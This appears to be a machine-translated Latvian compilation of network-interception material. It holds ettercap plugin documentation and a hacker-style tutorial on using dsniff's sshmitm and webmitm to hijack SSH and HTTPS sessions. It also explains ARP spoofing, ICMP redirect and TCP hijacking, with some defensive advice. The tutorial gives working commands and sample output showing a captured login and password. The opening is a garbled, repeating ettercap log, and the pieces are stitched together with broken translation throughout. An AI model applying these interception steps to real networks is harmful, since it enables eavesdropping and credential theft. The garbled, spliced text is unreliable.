192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.35 izliekas 192.168.1.35 pretendēt uz 192.168.1.1.1.2. s jābūt 192.168.1.1 arp_cop : ( BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.1 arp_cop.192.35. : (BRĪDINĀJUMS) 192.168.1.35 izliekas 192. 168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.1. 2.168.1.1 arp_cop: (BRĪDINĀJUMS ) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.19pret2.1.1.3p.19. RNING ) 192.168.1.35 izliekas par 192.168 . 1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: 192.3.1.8 izliekas 192.3.5 16 8.1.1 arp_cop: (BRĪDINĀJUMS) 192.168. 1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.1.1. arp_p.19. ING) 192.16 8.1.35 izliekas par 192.168 .1.1.........................

7.2 automātiskā pievienošana

Tas automātiski pievienos jaunus upurus, kad tie izveidos savienojumu ar ARP saindēšanās mitm uzbrukumu. Tas meklē ARP pieprasījumus lokālajā tīklā, un, ja tas tiks atklāts, spraudnis pievienos resursdatoru upuru sarakstam, ja saraksts tika norādīts kā MĒRĶIS. Saimniekdators tiek pievienots, kad no tā ir redzams ARP pieprasījums.

7.3 chk_poison

Tas pārbauda, vai etrcap arp etch moduļi ir veiksmīgi. Tas nosūta viltotas ICMP atbalss paketes visiem ēsmas upuriem, vienlaikus izliekoties par katru upuri. Tas var noķert ICMP atbildi ar mūsu MAC adresi kā galamērķi, kas nozīmē, ka ēsma starp diviem mērķiem ir veiksmīga. Tas pārbauda abus katra savienojuma ceļus.

7.4 dns_spoof

Šis spraudnis pārtrauc DNS pieprasījumus un atbild ar viltotu (viltus) atbildi. Rediģējot failu etter.dns, varat izvēlēties, uz kuru adresi spraudnim jāatbild. Spraudnis pārtver A, AAAA, PTR, MX, WINS, SRV un TXT pieprasījumus. Ja tas bija A pieprasījums, failā tiek meklēts nosaukums un tiek atgriezta IP adrese (nosaukumā varat izmantot aizstājējzīmes).

Tas pats attiecas uz AAAA pieprasījumiem.

7.5 find_conn

Ļoti vienkāršs spraudnis, kas klausās ARP pieprasījumus, lai parādītu visus mērķus, ar kuriem saimniekdators vēlas sazināties. Tas var arī palīdzēt atrast adreses nezināmos LAN.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Mēģina identificēt etrcap paketes, kas nosūtītas uz LAN. Tas var būt noderīgi, lai identificētu kādu, kurš mēģina izmantot etrcap. Nepaļaujieties uz to 100%, jo testi darbojas tikai ar noteiktām sekvencēm/ID numuriem.

7.7 scan_poisoner

Pārbaudīs, vai starp kādu no sarakstā iekļautajiem saimniekiem un mums kāds neķeras. Pirmkārt, tā pārbauda, vai diviem sarakstā esošajiem saimniekiem ir vienādi MAC adrese. Tas var nozīmēt, ka viens no viņiem saindē mūs, izliekoties par otru. Tas var radīt daudz viltus pozitīvu rezultātu starpniekservera arp vidē. Lai veiktu šo pārbaudi, jums ir jāizveido saimniekdatoru saraksts. Pēc tam tas nosūta icmp atbalss paketes katram saraksta resursdatoram un pārbauda, vai atbildes avota mac adrese atšķiras no adreses, ko mēs saglabājām sarakstā ar šo IP. Tas varētu nozīmēt, ka kāds piemāna šo saimniekdatoru, izliekoties, ka viņam ir mūsu IP adrese, un pārsūtot pārtvertās paketes mums. Šo aktīvo testu nevar palaist neaizvainojošā režīmā.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

Tas mēģina noskaidrot, vai kāds nežēlo (klausās) degunu. Tas nosūta divus dažādus slikti veidotus ARP pieprasījumus katram mērķim resursdatora sarakstā un gaida atbildes. Ja atbilde nāca no mērķa resursdatora, ir vairāk vai mazāk iespējams, ka mērķa tīkla karte ir izlaidīgā režīmā. Tas var radīt viltus trauksmes signālus. Varat to palaist no komandrindas vai spraudņu izvēlnes. Tā kā tas klausās ARP atbildes, būs labāk, ja jūs tās neizmantosit, sūtot ARP pieprasījumus.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Piemērs veiksmīgai divu tīkla karšu uzminēšanai izlaidības režīmā:

Izvērst

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 autortiesības 2001-2015 Ettercap attīstības komanda Klausās: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/255.5:00:08. 27ff:feaf:30b9/64 SSL sadalīšanai failā etter.conf ir nepieciešams derīgs redir_command_on skripts. Ettercap var nedarboties pareizi. /proc/sys/net/ipv6/conf/eth0/use_tempaddr nav iestatīts uz 0. Privilēģijas ir samazinātas līdz EUID 65534 EGID 65534... 33 spraudņi 42 protokolu sadalītāji 57 porti uzraudzīti 20388 mac piegādātāja pirkstu nospiedumi 1766 tcppakalpojumi. : netika norādīts neviens skripts, netiek palaists! 255 saimniekdatoru nejauša izvēle skenēšanai... Tiek skenēta visa tīkla maska, lai atrastu 255 saimniekdatorus... * |============================== ===================================>| 100,00% 5 saimniekdatori ir pievienoti saimniekdatoru sarakstam... Tiek sākta vienotā sniffing... Tikai teksts Interfeiss ir aktivizēts... Nospiediet "h", lai saņemtu palīdzību. Search_promisc spraudņa aktivizēšana... search_promisc: Meklē daudzsološus NIC... Mazāk iespējams sniffing NIC : - 192.168.1.36 - 192.168.1.34 Visticamāk, sniffing NIC: - NAV Notiek teksta saskarnes aizvēršana... Ettercap pārtraukšana... Lua tīrīšana pabeigta! Vienotā šņaukšana tika pārtraukta.

7.9 sslstrip

SSL mitm uzbrukuma laikā ettercap aizstāj īsto SSL sertifikātu ar savu. Viltotais sertifikāts tiek izveidots lidojuma laikā un visi lauki tiek aizpildīti saskaņā ar reālo servera uzrādīto sertifikātu.

(62%)

(56.5%)

(RANDOM — 0,2%)

Šajā rakstā mēs aplūkosim uzbrukumus, piemēram, Man-in-the-Middle vai drīzāk metodi
SSH un HTTP trafika novirzīšana, izmantojot uzbrukumu Man in the Middle. Nevilksim kaķi aiz astes, bet ķersimies pie lietas.

Cilvēks pa vidu (īsumā MitM, no krievu valodas vienkārši - “starpnieka uzbrukums” vai “cilvēks
vidū") ir uzbrukuma veids, kura pamatā ir trafika novirzīšana starp divām mašīnām, lai pārtvertu informāciju — to tālāk izpētītu, iznīcinātu vai pārveidotu. Tātad, pirmā lieta, kas mums nepieciešama, ir pakotne dsniff (saiti uz pakotni redzēsiet vietnē raksta beigas). Kāpēc Jā, jo šajā pakotnē ir visas nepieciešamās utilītas, tostarp sshmitm (SSH trafika novirzīšana) un httpmitm (HTTP trafika novirzīšana), kas var apiet šādu drošības shēmu: cik zināms, protokoli ar datu šifrēšana ir diezgan -tie ir "droši"(šifrēšana palīdz :)) un neļauj veikt uzbrukumus "pa virsu" tīkla slānī.Šifrēšanas atslēga hakeram nav zināma - nav iespējams atšifrēt datus un ievietojiet arī komandu. Šķiet, ka viss ir kārtībā, bet lūk, kā to izdarīt
jo MitM uzbrukuma programmas (sshmitm un httpmitm) no dsniff pakotnes spēj apiet šī sistēma drošība (jūs varat apiet gandrīz visu). Tas viss tiek darīts saskaņā ar šādu principu:
starpposma resursdators saņem pieprasījumu no klienta, "pastādot", ka tas ir serveris, pēc tam pieslēdzoties reālajam serverim.
Otra lieta, kas mums vajadzīga, ir taisnas rokas, ceturtā lieta - vissvarīgākā lieta - ir vēlme un, protams, upuris, tas ir, dators, kuram mēs uzbruksim.

SSH trafika novirzīšana

Sagatavojot instrumentus, sapratāt, kas ir kas un kāpēc :). Iegūstiet sshmitm - tagad mēs novirzīsim SSH trafiku (viss, ko jūs nesapratāt ar teorētisko daļu - lasiet iepriekš)
izmantojot to, izmantojot mūsdienu PKI trūkumus (publiskās atslēgas infrastruktūra – atslēgu pārvaldības shēma, kuras pamatā ir
asimetriskās kriptogrāfijas metodes). Apskatīsim sintaksi
sshmitm:

sshmitm [-d] [-I] [-p ports] resursdators

D
atļaut atkļūdošanas izvadi (t.i., uzlaboto režīmu)

es
sesijas nolaupīšana

P ports
klausīšanās osta

saimnieks
attālā saimniekdatora adrese, kura sesijas tiks pārtvertas

osta
ports attālajā resursdatorā

Viss šķiet vienkārši un gaumīgi - nav nekā sarežģīta :). Sāksim īstenot uzbrukumu!

# sshmitm server.target.gov // norādiet savu SSH serveri
sshmitm: pārsūtīšana uz serveri server.target.gov

Tā kā mums nav īstas SSH atslēgas, komandu tulks uzbruka
parādīs pieprasījumu pārbaudīt saimniekdatora atslēgu, tas viss izskatīsies apmēram šādi:

clientmachine$ server.target.gov
@BRĪDINĀJUMS: IR MAINĪTIES TĀLĀS DZĪVNIEKA IDENTIFIKĀCIJA! @
IESPĒJAMS, KA KĀDS DARA KO NELIETĪGU!
Iespējams, kāds šobrīd jūs noklausās (uzbrukums vīrieša vidū)!
Iespējams, ka tikko ir mainīta RSA resursdatora atslēga.
Lūdzu, sazinieties ar sistēmas administratoru.

Un tad lietotājs izlems, vai izveidot savienojumu vai nē. Ja jā, tad mēs pilnībā kontrolēsim SSH sesiju.
BET! Ja lietotājs nekad nav izveidojis savienojumu ar šo automašīnu, var tikt parādīts šāds ziņojums:

Nevar noteikt resursdatora "server.target.gov" autentiskumu
RSA atslēgas pirkstu nospiedums ir
bla:bla:bla;bla;bla.......
Vai tiešām vēlaties turpināt savienojumu (jā/nē)?

Šeit arī lietotājam ir divas izvēles – pieslēgties vai nē. Ja jā, tad sesiju pārtvērām, ja nē, tad diemžēl... :(.
Kopumā uzbrukums bija veiksmīgs, ja lietotājs pieslēdzās, un sshmitm, savukārt, ierakstīja visas caurlaides un pieteikšanās, turklāt ļoti lasāmā veidā :)
Protams, šis nav vienīgais SSH sesijas pārtvērējs, taču, iepazīstoties ar to, varat viegli apgūt citu :)

HTTP trafika novirzīšana

Tagad mēs novirzīsim HTTP trafiku. Atkal mums būs nepieciešams iepriekš izvēlēts rīks: httpmitm, kas noklausās portus 80 (HTTP -) un 443 (HTTPS -), pārtver WEB pieprasījumus, pēc tam izveido savienojumu ar serveri un pārsūta pieprasījumus uz klienta datoru. Programma arī ģenerē SSL atslēgas un SSL sertifikātus, izmantojot OpenSSL. Tad, pēc mēģinājuma
izveido savienojumu ar vietni (target.gov), pārlūkprogramma pārbaudīs SSL sertifikātu. Tā kā sertifikāti nesakritīs, lietotāja pārlūkprogramma brīdinās par to
nepareizs SSL sertifikāts. No uzbrucēja viedokļa tas izskatīsies apmēram šādi:

#webmitm -d
webmitm: pārskatāma pārraide
webmitm: jauns savienojums no
IEGŪT [saite]/uzerz.php?user=helknights&password=neskaju1qwerty HTTP/[versija]
Savienojums: [tips]
Saimnieks: www.target.gov
Lietotāja aģents: [sistēma, pārlūkprogrammas informācija]
[utt, utt, utt]
Sīkdatne: [sīkfaili]

Lūk, kā tas viss izskatās no malas -
SSL savienojums tiek pārtverts, tverot nešifrētus datus.

Secinājums

Šajā rakstā mēs apskatījām SSH un HTTP trafika novirzīšanu, izmantojot uzbrukumu Man in the Middle — skaidri, detalizēti, īsi. Citi HTTP un SSH novirzītāji
Jūs ātri apgūsit trafiku, izmantojot MitM, ja esat apguvis arī šos :)). Ja kaut kas bija neskaidrs, tad...

Datu pārtveršana tīklā ir jebkuras informācijas saņemšana no attālas datora ierīces. Tas var sastāvēt no lietotāja personiskās informācijas, viņa ziņojumiem un vietnes apmeklējumu ierakstiem. Datu tveršanu var veikt, izmantojot spiegprogrammatūru vai tīkla sniffers.

Spiegprogrammatūra ir īpaša programmatūra, kas var ierakstīt visu tīklā pārsūtīto informāciju no noteiktas darbstacijas vai ierīces.

Sniffer ir programma vai datortehnoloģija, kas pārtver un analizē trafiku, kas iet caur tīklu. Sniffer ļauj izveidot savienojumu ar tīmekļa sesiju un veikt dažādas darbības datora īpašnieka vārdā.

Ja informācija netiek pārsūtīta reāllaikā, spiegprogrammatūraģenerēt atskaites, kas ļauj ērti skatīt un analizēt informāciju.

Tīkla pārtveršanu var veikt legāli vai nelikumīgi. Galvenais dokuments, kas nosaka informācijas iegūšanas likumību, ir Konvencija par kibernoziegumiem. Tas tika izveidots Ungārijā 2001. gadā. Juridiskās prasības dažādās valstīs var nedaudz atšķirties, taču galvenais vēstījums visām valstīm ir vienāds.

Klasifikācija un metodes datu pārtveršanai tīklā

Saskaņā ar iepriekš minēto informācijas pārtveršanu tīklā var iedalīt divos veidos: autorizētā un neatļautā.

Autorizēta datu iegūšana tiek veikta dažādiem mērķiem, sākot no korporatīvās informācijas aizsardzības līdz valsts drošības nodrošināšanai. Pamatojumu šādas operācijas veikšanai nosaka likumdošana, specdienesti, tiesībsargājošās iestādes, speciālisti administratīvās organizācijas un uzņēmuma drošības pakalpojumi.

Ir starptautiski datu pārtveršanas standarti. Eiropas Telekomunikāciju standartu institūtam ir izdevies saskaņot vairākus tehniskos procesus (ETSI ES 201 158 “Telekomunikāciju drošība; Likumīga pārtveršana (LI); Prasības tīkla funkcijām”), uz kuriem balstās informācijas pārtveršana. Rezultātā tika izstrādāta sistēmas arhitektūra, kas palīdz slepeno dienestu speciālistiem un tīkla administratoriem legāli iegūt datus no tīkla. Izstrādātā struktūra datu pārtveršanas ieviešanai tīklā tiek izmantota vadu un bezvadu sistēmas balss zvani, kā arī korespondence pa pastu, balss ziņu pārraide pa IP, informācijas apmaiņa ar SMS.

Neatļautu datu pārtveršanu tīklā veic uzbrucēji, kuri vēlas iegūt savā īpašumā konfidenciālus datus, paroles, korporatīvos noslēpumus, tīklā esošo datoru adreses utt. Lai sasniegtu savus mērķus, hakeri parasti izmanto tīkla trafika analizatoru - sniffer. Šī programma vai aparatūras-programmatūras ierīce dod krāpniekam iespēju pārtvert un analizēt informāciju tīklā, kuram ir pievienots cietušais lietotājs, tostarp šifrētu SSL trafiku, izmantojot sertifikātu viltošanu. Satiksmes datus var iegūt dažādos veidos:

klausoties tīkla interfeisu,
pārtveršanas ierīces pievienošana kanāla pārtraukumam,
izveidojot satiksmes atzaru un dublējot to snifferim,
veicot uzbrukumu.

Ir arī sarežģītākas tehnoloģijas svarīgas informācijas pārtveršanai, kas ļauj iejaukties tīkla mijiedarbībā un mainīt datus. Viena no šādām metodēm ir viltoti ARP pieprasījumi. Metodes būtība ir nomainīt IP adreses starp upura datoru un uzbrucēja ierīci. Vēl viena metode, ko var izmantot, lai pārtvertu datus tīklā, ir viltus maršrutēšana. Tas ietver tīkla maršrutētāja IP adreses aizstāšanu ar savu adresi. Ja kibernoziedznieks zina, kā ir sakārtots lokālais tīkls, kurā atrodas upuris, tad viņš var viegli organizēt informācijas saņemšanu no lietotāja iekārtas uz savu IP adresi. Noder arī TCP savienojuma uztveršana efektīvā veidā datu pārtveršana. Uzbrucējs pārtrauc sakaru sesiju, ģenerējot un nosūtot upura datoram TCP paketes. Tālāk sakaru sesiju atjauno, pārtver un turpina noziedznieks klienta vietā.

Ietekmes objekts

Datu pārtveršanas objekti tīklā var būt valsts aģentūras, rūpniecības uzņēmumi, komercstruktūras un parastie lietotāji. Organizācijā vai biznesa uzņēmumā informāciju var iegūt, lai aizsargātu tīkla infrastruktūru. Izlūkošanas aģentūras un tiesībaizsardzības aģentūras atkarībā no veicamā uzdevuma var veikt dažādu īpašnieku pārsūtītās informācijas masveida pārtveršanu.

Ja runājam par kibernoziedzniekiem, tad jebkurš lietotājs vai organizācija var kļūt par ietekmes objektu, lai iegūtu tīklā pārsūtītos datus. Izmantojot autorizētu piekļuvi, svarīga ir saņemtās informācijas informatīvā daļa, savukārt uzbrucēju vairāk interesē dati, kurus var izmantot, lai izņemtu skaidrā naudā vai vērtīgu informāciju tās turpmākai pārdošanai.

Visbiežāk lietotāji, kas pieslēdzas publiskajam tīklam, piemēram, kafejnīcā ar karsto punktu, kļūst par kibernoziedznieku informācijas pārtveršanas upuriem. Wi-Fi piekļuve. Uzbrucējs izveido savienojumu ar tīmekļa sesiju, izmantojot sniffer, aizstāj datus un nozog personisko informāciju. Vairāk par to, kā tas notiek, lasiet rakstā.

Draudi avots

Atļautu informācijas pārtveršanu uzņēmumos un organizācijās veic publiskā tīkla infrastruktūras operatori. Viņu darbība ir vērsta uz personas datu, komercnoslēpumu un citu aizsardzību svarīga informācija. Juridiski ziņojumu un failu pārsūtīšanu var uzraudzīt izlūkdienesti, tiesībsargājošās iestādes un dažādas valsts iestādes, lai nodrošinātu iedzīvotāju un valsts drošību.

Noziedznieki nodarbojas ar nelikumīgu datu pārtveršanu. Lai nekļūtu par kibernoziedznieka upuri, ir jāievēro daži ekspertu ieteikumi. Piemēram, nevajadzētu veikt darbības, kurām nepieciešama autorizācija un sensitīvu datu pārsūtīšana vietās, kur ir savienojums ar publiskajiem tīkliem. Drošāk ir izvēlēties tīklus ar šifrēšanu un vēl labāk – izmantot personīgos 3G un LTE modemus. Pārsūtot personas datus, ieteicams tos šifrēt, izmantojot HTTPS protokolu vai personīgo VPN tuneli.

Jūs varat aizsargāt savu datoru no tīkla trafika pārtveršanas, izmantojot kriptogrāfiju un anti-sniffers; Iezvanpieeja, nevis piekļuve bezvadu tīklam samazinās riskus.

Šajā nodarbībā ir aprakstītas tīkla uzlaušanas tehnoloģijas, kuru pamatā ir tīkla pakešu pārtveršana. Hakeri izmanto šādas tehnoloģijas, lai noklausītos tīkla trafiku, lai nozagtu vērtīgu informāciju, organizētu datu pārtveršanu uzbrukuma "cilvēks vidū", pārtvertu TCP savienojumus, ļaujot, piemēram, datu viltošanu, un veiktu citas darbības. tikpat interesantas darbības. Diemžēl lielākā daļa šo uzbrukumu faktiski tiek īstenoti tikai Unix tīkliem, kuriem hakeri var izmantot abus īpaši komunālie pakalpojumi un Unix sistēmas rīki. Acīmredzot hakeri ir ignorējuši Windows tīklus, un mēs esam spiesti ierobežot datu pārtveršanas rīku aprakstu, iekļaujot programmas, kas paredzētas nenozīmīgai tīkla pakešu klausīšanai. Tomēr nevajadzētu atstāt novārtā vismaz teorētisku šādu uzbrukumu aprakstu, īpaši pret hakeriem, jo zināšanas par izmantotajām hakeru tehnoloģijām palīdzēs novērst daudzas nepatikšanas.

Tīkla šņaukšana

Parasti izmanto Ethernet tīklu šņaukšanai. tīkla kartes pārslēdzās uz klausīšanās režīmu. Klausīšanās Ethernet tīkli nepieciešama datora, kurā darbojas sniffer programma, pieslēgšana tīkla segmentam, pēc tam visa tīkla trafiks, ko nosūta un saņem datori šajā tīkla segmentā, kļūst pieejams hakeram. Vēl vienkāršāk ir pārtvert trafiku no radio tīkliem, kas izmanto bezvadu tīkla starpniekus – šajā gadījumā pat nav jāmeklē vieta, kur pieslēgties kabelim. Vai arī uzbrucējs var pieslēgties telefona līnijai, kas savieno datoru ar interneta serveri, atrodot tam piemērotu vietu (telefona līnijas parasti tiek ieliktas pagrabos un citās reti apmeklētās vietās bez jebkādas aizsardzības).

Lai demonstrētu šņaukšanas tehnoloģiju, mēs izmantosim ļoti populāro šņaukšanas programmu SpyNet, kas ir atrodama daudzās tīmekļa vietnēs. SpyNet programmas oficiālā vietne atrodas vietnē http://members.xoom.com/layrentiu2/, kur varat lejupielādēt programmas demonstrācijas versiju.

SpyNet programma sastāv no diviem komponentiem - CaptureNet un PipeNet. Programma CaptureNet ļauj pārtvert Ethernet tīklā pārsūtītās paketes tīkla līmenī, t.i. Ethernet rāmju veidā. PipeNet programmatūra ļauj salikt Ethernet rāmjus lietojumprogrammu slāņa paketēs, atjaunojot, piemēram, ziņojumus E-pasts, HTTP protokola ziņojumus (informācijas apmaiņa ar Web serveri) un veikt citas funkcijas.

Diemžēl SpyNet demonstrācijā PipeNet iespējas ir ierobežotas līdz HTTP pakešu montāžas demonstrācijai, tāpēc mēs nevarēsim pilnībā demonstrēt SpyNet. Tomēr mēs demonstrēsim SpyNet tīkla šņaukšanas iespējas, izmantojot mūsu eksperimentālo tīklu kā piemēru, nododot teksta fails no Sword-2000 saimniekdatora uz Alex-Z saimniekdatoru, izmantojot parasto Windows Explorer. Tajā pašā laikā datorā A1ex-1 palaižam programmu CaptureNet, kas pārtvers pārsūtītās paketes un ļaus nolasīt pārraidītā faila saturu Ethernet kadros. Attēlā 1 parāda slepenā ziņojuma tekstu failā secret.txt; mēs mēģināsim atrast šo tekstu uzņemtajos Ethernet kadros.

Rīsi. 1. Slepenā ziņojuma teksts Notepad logā

Lai uzņemtu Ethernet kadrus, rīkojieties šādi:

Datorā Alex-Z palaidiet programmu CaptureNet. Parādītajā programmas darba logā izvēlieties izvēlnes komandu Capture * Start (Capture * Start) un sāciet tīkla kadru pārtveršanas procesu.

Izmantojot Windows Explorer, kopējiet failu security.txt no datora Sword-2000 uz A1ex-3.

Pēc faila secret.txt pārsūtīšanas atlasiet izvēlnes komandu Capture * Stop un pārtrauciet uztveršanas procesu.

Uzņemtie Ethernet kadri parādīsies CaptureNet programmas loga labajā pusē (2. attēls), katra rinda augšējā sarakstā attēlo Ethernet rāmi, bet zem saraksta - atlasītā kadra saturu.

Rīsi. 2. Ethernet rāmis satur slepenas ziņas tekstu

Pārbaudot pārtverto kadru sarakstu, mēs varam viegli atrast to, kurā ir mūsu pārsūtītais teksts. Tas ir ļoti liels noslēpums (Tas ir ļoti liels noslēpums).

Mēs uzsveram, ka šis ir vienkāršākais piemērs, kad tika reģistrēta visa pārtvertā tīkla trafika. CaptureNet ļauj pārtvert paketes, kas nosūtītas, izmantojot noteiktus protokolus un uz noteiktiem resursdatora portiem, atlasīt ziņojumus ar noteiktu saturu un uzkrāt tvertos datus failā. Šādu darbību veikšanas tehnika ir vienkārša, un to var apgūt, izmantojot SpyNet programmas palīdzības sistēmu.

Papildus primitīvai tīkla noklausīšanai hakeriem ir pieejami sarežģītāki datu pārtveršanas līdzekļi. Tālāk sniegts īss šādu metožu pārskats, kaut arī no teorētiskā aspekta. Iemesls ir tāds, ka Windows tīklos datu pārtveršanas uzbrukumu praktiskā īstenošana ir ārkārtīgi ierobežota, un uzticamu utilītu komplekts pārtveršanas uzbrukumiem ir diezgan slikts.

Tīkla trafika pārtveršanas metodes

Tīkla šņaukšana, izmantojot tīkla analizatora programmas, piemēram, CaptureNet, ir pirmais, vienkāršākais veids, kā pārtvert datus. Papildus SpyNet tīkla sniffing tiek izmantoti daudzi rīki, kas sākotnēji tika izstrādāti, lai analizētu tīkla darbību, diagnosticētu tīklus, atlasītu trafiku atbilstoši noteiktiem kritērijiem un citiem tīkla administrēšanas uzdevumiem. Šādas programmas piemērs ir tcpdump (http://www.tcpdump.org), kas ļauj reģistrēt tīkla trafiku īpašā žurnālā turpmākai analīzei.

Lai aizsargātu pret tīkla noklausīšanos, tiek izmantotas īpašas programmas, piemēram, AntiSniff (http://www.securitysoftwaretech.com/antisniff), kas spēj identificēt tīklā esošos datorus, kas klausās tīkla trafiku. Lai atrisinātu savas problēmas, antisniffer programmas izmanto īpašu noklausīšanās ierīču klātbūtnes zīmi tīklā - sniffer datora tīkla kartei ir jābūt īpašā klausīšanās režīmā. Klausīšanās režīmā tīkla datori īpašā veidā reaģē uz IP datagrammām, kas tiek nosūtītas uz testējamo resursdatoru. Piemēram, noklausīšanās resursdatori parasti apstrādā visu ienākošo trafiku, nevis tikai uz resursdatora adresi nosūtītās datagrammas. Ir arī citas pazīmes, kas norāda uz aizdomīgu saimniekdatora uzvedību, ko AntiSniff var atpazīt.

Viltus ARP pieprasījumi

Lai pārtvertu un pārņemtu tīkla mijiedarbības procesu starp diviem resursdatoriem A un B, uzbrucējs var aizstāt mijiedarbojošo resursdatoru IP adreses ar savu IP adresi, nosūtot viltotus ARP (Address Resolution Protocol) ziņojumus resursdatoriem A un B. Ar ARP protokolu varat iepazīties D pielikumā, kurā ir aprakstīta resursdatora IP adreses atrisināšanas (pārveidošanas) procedūra uz resursdatora tīkla kartē iekodēto mašīnas adresi (MAC adresi). Apskatīsim, kā hakeris var izmantot ARP, lai pārtvertu tīkla sakarus starp resursdatoriem A un B.

Uzbrucējs nosaka resursdatoru A un B MAC adreses, piemēram, izmantojot W2RK pakotnes komandu nbtstat.

Uzbrucējs uz identificētajām resursdatoru A un B MAC adresēm nosūta ziņojumus, kas ir viltotas ARP atbildes uz pieprasījumiem atrisināt saimniekdatoru IP adreses uz datoru MAC adresēm. Resursdators A tiek informēts, ka resursdatora B IP adrese atbilst uzbrucēja datora MAC adresei; resursdators B tiek informēts, ka resursdatora A IP adrese atbilst arī uzbrucēja datora MAC adresei.

Saimniekdatori A un B glabā saņemtās MAC adreses savās ARP kešatmiņās un pēc tam izmanto tās, lai nosūtītu ziņojumus viens otram. Tā kā IP adreses A un B atbilst uzbrucēja datora MAC adresei, resursdatori A un B, nenojaušot, sazinās ar starpnieka starpniecību, kas var darīt visu ar saviem ziņojumiem.

Lai aizsargātu pret šādiem uzbrukumiem, tīkla administratoriem ir jāuztur datu bāze ar atbilstības tabulu starp viņu tīkla datoru MAC adresēm un IP adresēm. Tālāk, izmantojot īpašu programmatūra Piemēram, arpwatch utilītas (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) var periodiski apsekot tīklu un noteikt neatbilstības.

UNIX tīklos šāda veida viltotu ARP pieprasījumu uzbrukumu var īstenot, izmantojot sistēmas utilītas tīkla trafika uzraudzībai un pārvaldībai, piemēram, arpredirect. Diemžēl šķiet, ka šādas uzticamas utilītas nav ieviestas Windows 2000/XP tīklos. Piemēram, NTsecurity vietnē (http://www.ntsecurity.nu) varat lejupielādēt GrabitAII utilītu, kas tiek piedāvāts kā rīks trafika novirzīšanai starp tīkla resursdatoriem. Tomēr GrabitAII utilīta funkcionalitātes pamata pārbaude parāda, ka līdz pilnīgai veiksmei tās funkciju ieviešanā vēl ir tālu.

Viltus maršrutēšana

Lai veiktu viltus maršrutēšanu, uzbrucējam ir jāzina daži dati par lokālā tīkla organizāciju, kurā atrodas resursdators A, jo īpaši maršrutētāja IP adrese, caur kuru tiek nosūtīta trafika no resursdatora A uz B. To zinot, uzbrucējs ģenerēs IP datagrammu, kurā IP — sūtītāja adrese ir definēta kā maršrutētāja IP adrese, un adresāts ir resursdators A. Datagrammā ir iekļauts arī ICMP Redirect ziņojums ar jaunā maršrutētāja adreses lauku, kas iestatīts uz Uzbrucēja datora IP adrese. Saņemot šādu ziņojumu, resursdators A nosūtīs visus ziņojumus uz uzbrucēja datora IP adresi.

Iepriekš minētie pārtveršanas piemēri (kuriem uzbrucēju iespējas nebūt nav ierobežotas) pārliecina par nepieciešamību aizsargāt tīklā pārsūtītos datus, ja tajos ir konfidenciāla informācija. Vienīgā aizsardzības metode pret tīkla trafika pārtveršanu ir tādu programmu izmantošana, kas ievieš kriptogrāfiskus algoritmus un šifrēšanas protokolus un novērš slepenas informācijas izpaušanu un aizstāšanu. Lai atrisinātu šādas problēmas, kriptogrāfija nodrošina rīkus, lai šifrētu, parakstītu un pārbaudītu ziņojumu autentiskumu, izmantojot drošus protokolus.

Visu 4. nodaļā aprakstīto kriptogrāfijas metožu praktisko ieviešanu informācijas apmaiņas aizsardzībai nodrošina VPN (Virtual Private Network) tīkli. Īss pārskats par kriptogrāfijas drošības principiem un metodēm ir atrodams E pielikumā un Detalizēts apraksts kriptogrāfijas aizsardzības rīki, ko nodrošina lietojumprogramma PGP Desktop Security (http://www.pgp.com).

TCP savienojuma pārtveršana

TCP savienojumu nolaupīšanas uzbrukumu veikšanai ir izveidotas vairākas efektīvas utilītas, taču tās visas ir ieviestas Unix platformai, un tīmekļa vietnēs šīs utilītas tiek parādītas tikai pirmkoda formā. Tādējādi, kā pārliecināti praktiķi par uzlaušanas cēlo cēloni, uzbrukumi, izmantojot TCP savienojuma pārtveršanas metodi, mums nav īpaši noderīgi. (Tie, kam patīk saprast citu cilvēku programmas kodu, var atsaukties uz vietni http://www.cri.cz/~kra/index.html, kur var lejupielādēt avots plaši pazīstamā Hunt TCP savienojuma pārtveršanas utilīta no Pāvela Krauza).

Neskatoties uz praktisko rīku trūkumu, mēs nevaram ignorēt tik interesantu tēmu kā TCP savienojumu pārtveršana, un mēs pakavēsimies pie dažiem šādu uzbrukumu aspektiem. Daļa informācijas par TCP paketes uzbūvi un TCP savienojumu izveides kārtību ir sniegta šīs grāmatas D pielikumā, taču šeit pievērsīsimies jautājumam – kas īsti ļauj hakeriem veikt TCP savienojuma pārtveršanas uzbrukumus? Apskatīsim šo tēmu sīkāk, galvenokārt paļaujoties uz diskusiju un.

TCP protokols (Transmission Control Protocol) ir viens no pamata OSI transporta slāņa protokoliem, kas ļauj izveidot loģiskus savienojumus, izmantojot virtuālo sakaru kanālu. Pa šo kanālu tiek pārsūtītas un saņemtas paketes ar ierakstītu to secību, tiek kontrolēta pakešu plūsma, organizēta izkropļoto pakešu retranslācija, un sesijas beigās sakaru kanāls tiek pārtraukts. TCP protokols ir vienīgais pamata protokols TCP/IP saimē, kam ir uzlabota ziņojumu identifikācijas un savienojuma sistēma.

